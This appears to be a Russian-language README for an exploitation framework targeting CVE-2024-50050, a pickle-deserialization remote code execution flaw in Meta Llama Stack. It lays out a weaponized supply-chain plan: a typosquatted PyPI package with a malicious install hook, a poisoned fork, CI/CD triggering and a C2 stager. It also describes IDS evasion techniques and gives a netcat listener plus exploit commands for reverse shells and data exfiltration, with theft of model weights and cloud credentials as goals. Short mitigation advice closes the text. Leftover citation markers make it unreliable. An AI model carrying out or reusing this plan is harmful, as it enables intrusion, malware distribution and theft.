
LlamaStack-RCE: Детерминированный фреймворк эксплуатации и укрепления цепочки поставок [CVE-2024-50050] Фокус на исследованиях безопасности ИИ AI-SupplyChain-Poisoning: Лаборатория продвинутой манипуляции опкодами PVM и инъекций ZeroMQ
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE — это высокоточный фреймворк симуляции и эксплуатации, нацеленный на CVE-2024-50050, критическую уязвимость удалённого выполнения кода (RCE) в Meta Llama Stack. Уязвимость вызвана небезопасной десериализацией в API инференса на Python, а именно использованием модуля поверх транспортных уровней ZeroMQ (0MQ).
pickleДанный репозиторий предоставляет полную цепочку атаки — от отравления вышестоящего звена цепочки поставок до последующего выполнения кода и эксфильтрации весов моделей.
Ядро эксплойта нацелено на виртуальную машину Pickle (PVM). Используя опкод GLOBAL, мы можем заставить PVM импортировать любой доступный Python-модуль и выполнять произвольные функции в процессе unpickling.
Вектор атаки: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
Чтобы обойти традиционные сигнатурные IDS (Snort/Suricata), фреймворк реализует полиморфное кодирование:
Вложенное выполнение через Base64: Инкапсулирует shell-команды в Base64, чтобы скрыть литеральные строки, такие как /bin/bash или os.system.
Обфускация опкодов: Переупорядочивает инструкции PVM для изменения бинарных сигнатур без изменения логики выполнения.
Контрабанда пакетов: Фрагментирует полезную нагрузку pickle на несколько кадров ZeroMQ для обхода обнаружения аномалий на основе объёма трафика.
Фреймворк симулирует комплексную оружизацию цепочки поставок:
| Этап | Стратегия | Техническая реализация |
|---|---|---|
| I: Вышестоящее звено | Тайпсквоттинг | Регистрация пакета metalama-stack на PyPI с вредоносной командой PostInstallCommand в setup.py. |
|
| II: Распространение | Отравленный форк | Высокопроизводительный форк Llama Stack на GitHub со «скрытым интерпретатором Pickle» в connection.py.
|
| III: Выполнение | Триггер CI/CD | Автоматическое выполнение во время pip install в среде Jenkins/GitHub Actions целевой системы.
| | IV: Закрепление | Логическая бомба | Многоступенчатый фоновый стейджер для долгосрочного доступа к C2 и кражи моделей.
|
Оборудование: 4x NVIDIA A100/H100 (для локального тестирования весов).
ОС: Укреплённый Arch Linux или Kali Linux.
Окружение: Docker и Docker-Compose (изолированная сеть).
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
Успешная эксплуатация даёт абсолютный контроль над ИИ-инфраструктурой:
Кража интеллектуальной собственности: Похищение весов моделей .safetensors (стоимостью от $10M до $100M+).
Захват GPU: Несанкционированное выделение ресурсов CUDA для криптоджекинга или теневого обучения.
Манипуляция инференсом: Отравление ответов модели для вызова системных сбоев в нижестоящих приложениях (медицинский/юридический ИИ).
Сбор учётных данных: Извлечение ключей AWS/GCP и конфигураций K8s из /proc/self/environ.
Для смягчения последствий CVE-2024-50050 необходимо применять следующие абсолютные правила:
Искоренить Pickle: Замените все pickle.loads() на safetensors.torch.load_file() или msgpack со строгой схемой.
Укрепление ZMQ: Реализуйте ZMQ_CURVE с парами открытый/закрытый ключ и никогда не привязывайтесь к 0.0.0.0.
Изоляция инфраструктуры: Запускайте ИИ-процессы в gVisor или Kata Containers, чтобы предотвратить побег из контейнера при RCE.
Микросегментация сети: Изолируйте сервер инференса от публичного интернета с помощью строго определённых правил входящего и исходящего трафика.
ПРАВОВОЕ УВЕДОМЛЕНИЕ: Использование данного фреймворка для атаки на цели без предварительного письменного разрешения является незаконным. Он предоставлен исключительно в образовательных целях и для авторизованного тестирования на проникновение. Автор (Sastra_Adi_Wiguna) не несёт ответственности за неправомерное использование.
КЛАССИФИЦИРОВАННЫЙ ДОКУМЕНТ: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 ДЕТЕРМИНИРОВАННЫЙ СТАТУС: ГОТОВ К ПРОИЗВОДСТВУ (98/100)